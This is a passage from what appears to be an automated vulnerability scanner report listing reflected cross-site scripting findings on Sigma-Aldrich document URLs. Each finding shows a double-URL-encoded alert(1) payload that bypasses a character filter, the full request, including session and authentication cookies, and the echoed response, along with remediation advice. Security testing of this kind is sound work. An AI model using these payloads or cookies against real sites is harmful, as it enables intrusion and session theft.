The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d3ad%2522%253balert%25281%2529%252f%252f038547d0233 was submitted in the REST URL parameter 3. This input was echoed as 8d3ad";alert(1)//038547d0233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs8d3ad%2522%253balert%25281%2529%252f%252f038547d0233/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:20 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs8d3ad";alert(1)//038547d0233/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.294. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ac18%2522%253balert%25281%2529%252f%252f90ea998edb5 was submitted in the REST URL parameter 4. This input was echoed as 3ac18";alert(1)//90ea998edb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma3ac18%2522%253balert%25281%2529%252f%252f90ea998edb5/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:26 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma3ac18";alert(1)//90ea998edb5/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.295. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eea2%2522%253balert%25281%2529%252f%252ffd80cad0ff9 was submitted in the REST URL parameter 5. This input was echoed as 2eea2";alert(1)//fd80cad0ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/Bulletin2eea2%2522%253balert%25281%2529%252f%252ffd80cad0ff9/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:37 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/Bulletin2eea2";alert(1)//fd80cad0ff9/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.296. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ba81%2522%253balert%25281%2529%252f%252fecdfc01212 was submitted in the REST URL parameter 6. This input was echoed as 2ba81";alert(1)//ecdfc01212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/Bulletin/2ba81%2522%253balert%25281%2529%252f%252fecdfc01212/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:40 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/Bulletin/2ba81";alert(1)//ecdfc01212/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.297. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69cd6%2522%253balert%25281%2529%252f%252faf8a76e8aff was submitted in the REST URL parameter 1. This input was echoed as 69cd6";alert(1)//af8a76e8aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc69cd6%2522%253balert%25281%2529%252f%252faf8a76e8aff/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:55 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc69cd6";alert(1)//af8a76e8aff/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.298. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

